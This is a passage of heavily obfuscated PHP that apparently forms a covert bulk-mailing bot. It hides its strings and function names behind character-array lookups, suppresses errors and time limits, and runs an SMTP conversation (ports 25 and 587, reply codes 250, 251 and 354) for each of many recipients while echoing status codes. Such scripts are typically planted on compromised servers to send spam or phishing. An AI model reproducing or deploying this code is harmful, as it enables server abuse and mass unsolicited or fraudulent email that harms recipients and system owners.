$r76[7].$r76[66].$r76[49].$r76[27].$r76[29].$r76[49].$r76[41].$r76[94].$r76[58]; $GLOBALS['vzqix48'] = $r76[66].$r76[87].$r76[24].$r76[94].$r76[90].$r76[78].$r76[54].$r76[66].$r76[94].$r76[87].$r76[54].$r76[96].$r76[5].$r76[49].$r76[27].$r76[29].$r76[53].$r76[58].$r76[61]; $GLOBALS['sltum36'] = $r76[66].$r76[87].$r76[24].$r76[94].$r76[90].$r76[78].$r76[54].$r76[66].$r76[94].$r76[87].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94].$r76[49].$r76[45].$r76[87]; $GLOBALS['clkxn20'] = $r76[66].$r76[87].$r76[24].$r76[94].$r76[90].$r76[78].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[5].$r76[53].$r76[94].$r76[58].$r76[87]; $GLOBALS['unkvq75'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[5].$r76[49].$r76[66].$r76[94]; $GLOBALS['yoxhh65'] = $r76[7].$r76[27].$r76[5].$r76[49].$r76[66].$r76[94]; $GLOBALS['dskbo69'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[24].$r76[94].$r76[90].$r76[95]; $GLOBALS['jhtbn88'] = $r76[7].$r76[94].$r76[49].$r76[7]; $GLOBALS['zflfl64'] = $r76[7].$r76[24].$r76[94].$r76[90].$r76[95]; $GLOBALS['uwnpx27'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[43].$r76[24].$r76[53].$r76[87].$r76[94]; $GLOBALS['stdvp96'] = $r76[7].$r76[43].$r76[24].$r76[53].$r76[87].$r76[94]; $GLOBALS['ocmvf65'] = $r76[24].$r76[90].$r76[58].$r76[95]; $GLOBALS['bkenc7'] = $r76[94].$r76[20].$r76[41].$r76[5].$r76[49].$r76[95].$r76[94]; $GLOBALS['llpxl21'] = $r76[41].$r76[90].$r76[27].$r76[29]; $GLOBALS['efljc33'] = $r76[45].$r76[58].$r76[41].$r76[90].$r76[27].$r76[29]; $GLOBALS['zndda55'] = $r76[27].$r76[61].$r76[35].$r76[36].$r76[61].$r76[14]; $GLOBALS['lzlla40'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[78].$r76[94].$r76[24].$r76[61].$r76[94]; $GLOBALS['axqrn63'] = $r76[5].$r76[49].$r76[58].$r76[61].$r76[46].$r76[53].$r76[41]; @$GLOBALS['vtton6'](NULL); @$GLOBALS['jlxru64']($r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[5].$r76[49].$r76[61],NULL); @$GLOBALS['jlxru64']($r76[5].$r76[49].$r76[61].$r76[54].$r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[66],0); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[11].$r76[32], 0x000F); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[4] , 0x0001); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[56].$r76[55], 0x0002); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[79].$r76[55].$r76[67].$r76[64].$r76[17].$r76[56] , 1); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[56].$r76[55].$r76[82].$r76[79].$r76[68] , 2); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[44].$r76[67].$r76[22].$r76[17].$r76[68].$r76[64].$r76[67].$r76[34] , 3); $GLOBALS['vajox38']($r76[6].$r76[56].$r76[55].$r76[54].$r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[4].$r76[6].$r76[6].$r76[64].$r76[67].$r76[64].$r76[17].$r76[56].$r76[4].$r76[71], 4); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67] , 1); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[0].$r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67], 2); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[55].$r76[67].$r76[68].$r76[79].$r76[4].$r76[11] , 4); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[67].$r76[34].$r76[3].$r76[79].$r76[54].$r76[56].$r76[17] , 5); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[67].$r76[40].$r76[3] , 1); $GLOBALS['vajox38']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[44].$r76[6].$r76[3] , 2); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67] , 0); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67].$r76[79].$r76[6] , 1); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[79].$r76[22].$r76[71].$r76[17] , 2); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[11].$r76[4].$r76[64].$r76[71].$r76[0].$r76[68].$r76[17].$r76[11] , 3); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[68].$r76[40].$r76[3].$r76[67].$r76[67].$r76[17] , 4); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[6].$r76[4].$r76[67].$r76[4] , 5); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[50].$r76[17].$r76[6].$r76[34] , 6); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[37].$r76[44].$r76[64].$r76[67] , 7); $GLOBALS['vajox38']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[11].$r76[3].$r76[71].$r76[79].$r76[67].$r76[79].$r76[6] , 8); $GLOBALS['qobdl72']($r76, NULL); $jabhi9 = array($r76[87].$r76[49].$r76[71].$r76[53].$r76[66].$r76[87] => "", $r76[7].$r76[24].$r76[49].$r76[78].$r76[71].$r76[49].$r76[61].$r76[53].$r76[58] => "", $r76[7].$r76[24].$r76[49].$r76[78].$r76[56].$r76[90].$r76[78].$r76[94] => "", $r76[66].$r76[45].$r76[96].$r76[47].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5] => "", $r76[96].$r76[49].$r76[95].$r76[69].$r76[67].$r76[94].$r76[78].$r76[41].$r76[5] => "", $r76[36].$r76[49].$r76[66].$r76[87].$r76[0].$r76[24].$r76[49].$r76[78] => ""); if (FALSE == $GLOBALS['yhrfr40']($r76, $jabhi9)) { echo PHP_OS.$r76[80].$GLOBALS['quzii24'](0987654321).$r76[80].$r76[52].$r76[76].$r76[80].$r76[1].$r76[1].$r76[9].$r76[9].$r76[30]; exit; } $iwule39 = array(); for ($afses42 = 0; $afses42 < $GLOBALS['tlyiy12']($jabhi9[$r76[87].$r76[49].$r76[71].$r76[53].$r76[66].$r76[87]]); $afses42++) { $kumlm43 = array( $r76[53].$r76[95] => $afses42, $r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49] => "", $r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80] => "", $r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78] => "", $r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78].$r76[80] => "", $r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[87].$r76[49] => "", $r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[7].$r76[24].$r76[49].$r76[78] => "", $r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87] => "", $r76[61].$r76[54].$r76[58].$r76[90].$r76[78].$r76[94].$r76[5].$r76[90].$r76[66].$r76[87] => "", $r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69] => "", $r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87] => "", $r76[61].$r76[54].$r76[7].$r76[7].$r76[7] => FALSE, $r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24] => "", $r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24].$r76[7].$r76[24].$r76[49].$r76[78] => "", $r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24] => "", $r76[66].$r76[54].$r76[78].$r76[20].$r76[36].$r76[49].$r76[66].$r76[87] => "", $r76[66].$r76[54].$r76[78].$r76[20].$r76[90].$r76[95].$r76[95].$r76[24] => FALSE, $r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29] => FALSE, $r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94] => $GLOBALS['kyioa8'](), $r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41] => $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67]), $r76[66].$r76[54].$r76[41].$r76[49].$r76[24].$r76[87] => 25, $r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58] => "", $r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87] => "", $r76[66].$r76[54].$r76[87].$r76[24].$r76[53].$r76[61] => FALSE, $r76[5].$r76[54].$r76[94].$r76[24].$r76[24] => "", $r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94] => FALSE, $r76[5].$r76[54].$r76[43].$r76[90].$r76[69] => 0, $r76[5].$r76[54].$r76[7].$r76[90].$r76[53].$r76[5].$r76[66].$r76[78].$r76[87].$r76[41] => FALSE, $r76[5].$r76[54].$r76[66].$r76[78].$r76[87].$r76[41].$r76[54].$r76[94].$r76[58].$r76[95] => FALSE, ); if (FALSE == $GLOBALS['nhnww15']($r76, $jabhi9[$r76[87].$r76[49].$r76[71].$r76[53].$r76[66].$r76[87]][$afses42], $jabhi9, $kumlm43)) { echo PHP_OS.$r76[80].$GLOBALS['quzii24'](1111111111).$r76[80].$r76[52].$r76[46].$r76[80].$r76[1].$r76[1].$GLOBALS['igajs32']($r76, $jabhi9[$r76[87].$r76[49].$r76[71].$r76[53].$r76[66].$r76[87]][$afses42]).$r76[9].$r76[9].$r76[30]; continue; } $iwule39[] = $kumlm43; } $GLOBALS['cpukq94']($r76, $iwule39); $GLOBALS['bdonk12']($r76, $iwule39); $GLOBALS['aurku4']($r76, $iwule39); exit; function ioxgo29($r76, $iwule39) { $hwrbl25 = 0; $spjea96 = ""; for ($afses42 = 0; $afses42 < $GLOBALS['tlyiy12']($iwule39); $afses42++) { if ($iwule39[$afses42][$r76[5].$r76[54].$r76[7].$r76[90].$r76[53].$r76[5].$r76[66].$r76[78].$r76[87].$r76[41]] == TRUE) { echo PHP_OS.$r76[80].$GLOBALS['quzii24'](2222222222).$r76[80].$r76[52].$r76[85].$r76[80].$r76[1].$r76[1].$GLOBALS['igajs32']($r76, $iwule39[$afses42][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]].$r76[39].$r76[74].$r76[74].$r76[39].$iwule39[$afses42][$r76[5].$r76[54].$r76[94].$r76[24].$r76[24]]).$r76[9].$r76[9].$r76[30]; } if ($iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] == TRUE) { $spjea96.= $iwule39[$afses42][$r76[5].$r76[54].$r76[43].$r76[90].$r76[69]]; $hwrbl25++; } } if ($hwrbl25 == 0) { echo PHP_OS.$r76[80].$GLOBALS['quzii24'](0987654321).$r76[80].$r76[52].$r76[85].$r76[80].$r76[1].$r76[1].$r76[9].$r76[9].$r76[30]; } else { echo $r76[17].$r76[19].$r76[80].$GLOBALS['quzii24'](1234567890).$r76[80].$hwrbl25.$r76[80].$GLOBALS['tlyiy12']($iwule39).$r76[86].$r76[1].$spjea96.$r76[9].$r76[30]; } } function hwgbo88($r76, &$iwule39) { if (!$GLOBALS['yqqkt30']($r76[78].$r76[90].$r76[53].$r76[5])) { return FALSE; } for ($afses42 = 0; $afses42 < $GLOBALS['tlyiy12']($iwule39); $afses42++) { if ($iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] == TRUE) { continue; } if ($iwule39[$afses42][$r76[61].$r76[54].$r76[7].$r76[7].$r76[7]]) { if (@$GLOBALS['tnmsd36']($iwule39[$afses42][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80]], $iwule39[$afses42][$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]], $iwule39[$afses42][$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]], $iwule39[$afses42][$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24].$r76[7].$r76[24].$r76[49].$r76[78]].$iwule39[$afses42][$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]], $r76[26].$r76[7].$iwule39[$afses42][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78]])) { $iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] = TRUE; $iwule39[$afses42][$r76[5].$r76[54].$r76[43].$r76[90].$r76[69]] = 2; } else { $iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] = FALSE; } } else { if (@$GLOBALS['tnmsd36']($iwule39[$afses42][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49].$r76[80]], $iwule39[$afses42][$r76[61].$r76[54].$r76[66].$r76[45].$r76[96].$r76[47].$r76[94].$r76[27].$r76[87]], $iwule39[$afses42][$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]], $iwule39[$afses42][$r76[61].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]])) { $iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] = TRUE; $iwule39[$afses42][$r76[5].$r76[54].$r76[43].$r76[90].$r76[69]] = 2; } else { $iwule39[$afses42][$r76[5].$r76[54].$r76[95].$r76[49].$r76[58].$r76[94]] = FALSE; } } } } function omauf87($r76, &$iwule39) { while ($GLOBALS['chqql44']($r76, $iwule39)) { $GLOBALS['cvtxr40']($r76, $iwule39); $GLOBALS['eavur97'](25000); } } function urvfu78($r76, &$iwule39, $xhovg5, $flunj82, $mavcb77) { if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]] != FALSE) { $GLOBALS['xcnkh30']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]]); } $iwule39[$xhovg5][$r76[5].$r76[54].$r76[94].$r76[24].$r76[24]] = $r76[1].$iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]].$r76[9].$GLOBALS['wnlxd28']($GLOBALS['laepm94']($r76[16].$r76[21].$r76[30].$r76[16], $r76[39], $flunj82)); $iwule39[$xhovg5][$r76[5].$r76[54].$r76[7].$r76[90].$r76[53].$r76[5].$r76[66].$r76[78].$r76[87].$r76[41]] = $mavcb77; $iwule39[$xhovg5][$r76[5].$r76[54].$r76[66].$r76[78].$r76[87].$r76[41].$r76[54].$r76[94].$r76[58].$r76[95]] = TRUE; return; } function ecyws30($r76, &$iwule39) { $oonnt88 = $GLOBALS['kyioa8'](); foreach($iwule39 as $xhovg5=>$kumlm43) { if ($kumlm43[$r76[5].$r76[54].$r76[66].$r76[78].$r76[87].$r76[41].$r76[54].$r76[94].$r76[58].$r76[95]] == TRUE) { continue; } if ($kumlm43[$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] + 20 < $oonnt88) { if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] == $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67]) && $iwule39[$xhovg5][$r76[66].$r76[54].$r76[41].$r76[49].$r76[24].$r76[87]] != 587) { $GLOBALS['xcnkh30']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[41].$r76[49].$r76[24].$r76[87]] = 587; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); continue; } $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $r76[87].$r76[53].$r76[78].$r76[94].$r76[49].$r76[45].$r76[87], FALSE); continue; } switch($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]]) { case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67]): if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[78].$r76[20].$r76[90].$r76[95].$r76[95].$r76[24]] == FALSE) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[78].$r76[20].$r76[90].$r76[95].$r76[95].$r76[24]] = @$GLOBALS['nxseo15']($iwule39[$xhovg5][$r76[66].$r76[54].$r76[78].$r76[20].$r76[36].$r76[49].$r76[66].$r76[87]]); if (!@$GLOBALS['cyzbs96']($r76[16].$r76[83].$r76[1].$r76[52].$r76[26].$r76[15].$r76[9].$r76[72].$r76[76].$r76[33].$r76[31].$r76[10].$r76[42].$r76[86].$r76[97].$r76[62].$r76[72].$r76[85].$r76[10].$r76[16], $iwule39[$xhovg5][$r76[66].$r76[54].$r76[78].$r76[20].$r76[90].$r76[95].$r76[95].$r76[24]])) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $r76[24].$r76[94].$r76[66].$r76[49].$r76[5].$r76[70].$r76[94].$r76[39].$r76[78].$r76[20], FALSE); break; } } $kdidw81 = 0; $msnsv40 = ''; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]] = $GLOBALS['yoejz48']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]], $GLOBALS['glyac65']($r76[55].$r76[17].$r76[40].$r76[19].$r76[79].$r76[67].$r76[54].$r76[3].$r76[68].$r76[17].$r76[67].$r76[17].$r76[54].$r76[67].$r76[40].$r76[3]), $iwule39[$xhovg5][$r76[66].$r76[54].$r76[78].$r76[20].$r76[90].$r76[95].$r76[95].$r76[24]], $iwule39[$xhovg5][$r76[66].$r76[54].$r76[41].$r76[49].$r76[24].$r76[87]], 2, $kdidw81, $msnsv40, TRUE); if ($iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]] == FALSE) { break; } if ($kdidw81 == 0 || $kdidw81 === 56 || $kdidw81 === 10056 ) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67].$r76[79].$r76[6]); $GLOBALS['lzjpr73']($r76, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[49].$r76[27].$r76[29]], 15); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[40].$r76[17].$r76[56].$r76[56].$r76[79].$r76[40].$r76[67].$r76[79].$r76[6]): if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $r76[79].$r76[22].$r76[71].$r76[17].$r76[39].$iwule39[$xhovg5][$r76[61].$r76[54].$r76[95].$r76[49].$r76[78].$r76[90].$r76[53].$r76[58].$r76[7].$r76[24].$r76[49].$r76[78]].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[79].$r76[22].$r76[71].$r76[17]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[79].$r76[22].$r76[71].$r76[17]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { if (substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 250) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], TRUE); break; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $r76[11].$r76[4].$r76[64].$r76[71].$r76[39].$r76[0].$r76[68].$r76[17].$r76[11].$r76[74].$r76[2].$iwule39[$xhovg5][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[7].$r76[24].$r76[49].$r76[78]].$r76[38].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[11].$r76[4].$r76[64].$r76[71].$r76[0].$r76[68].$r76[17].$r76[11]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[11].$r76[4].$r76[64].$r76[71].$r76[0].$r76[68].$r76[17].$r76[11]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { if (substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 250) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], TRUE); break; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $r76[68].$r76[40].$r76[3].$r76[67].$r76[39].$r76[67].$r76[17].$r76[74].$r76[2].$iwule39[$xhovg5][$r76[61].$r76[54].$r76[78].$r76[90].$r76[53].$r76[5].$r76[87].$r76[49]].$r76[38].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[68].$r76[40].$r76[3].$r76[67].$r76[67].$r76[17]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[68].$r76[40].$r76[3].$r76[67].$r76[67].$r76[17]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { if (substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 250 && substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 251) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], TRUE); break; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $r76[6].$r76[4].$r76[67].$r76[4].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[6].$r76[4].$r76[67].$r76[4]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[6].$r76[4].$r76[67].$r76[4]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { if (substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 354) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], TRUE); break; } $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]] = ""; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[49].$r76[45].$r76[87]] = $iwule39[$xhovg5][$r76[66].$r76[54].$r76[36].$r76[94].$r76[90].$r76[95].$r76[94].$r76[24]].$r76[21].$r76[30].$iwule39[$xhovg5][$r76[61].$r76[54].$r76[96].$r76[49].$r76[95].$r76[69]].$r76[21].$r76[30].$r76[86].$r76[21].$r76[30]; $iwule39[$xhovg5][$r76[66].$r76[54].$r76[66].$r76[87].$r76[94].$r76[41]] = $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[50].$r76[17].$r76[6].$r76[34]); $iwule39[$xhovg5][$r76[66].$r76[54].$r76[87].$r76[53].$r76[78].$r76[94]] = $GLOBALS['kyioa8'](); } break; } break; case $GLOBALS['glyac65']($r76[55].$r76[67].$r76[79].$r76[3].$r76[54].$r76[50].$r76[17].$r76[6].$r76[34]): if ($GLOBALS['zhjzv93']($r76, $iwule39, $xhovg5)) { if ($GLOBALS['osnjl91']($r76, $iwule39, $xhovg5)) { if (substr($iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], 0, 3) != 250) { $GLOBALS['ptlaz26']($r76, $iwule39, $xhovg5, $iwule39[$xhovg5][$r76[66].$r76[54].$r76[95].$r76[90].$r76[87].$r76[90].$r76[53].$r76[58]], TRUE); break; } 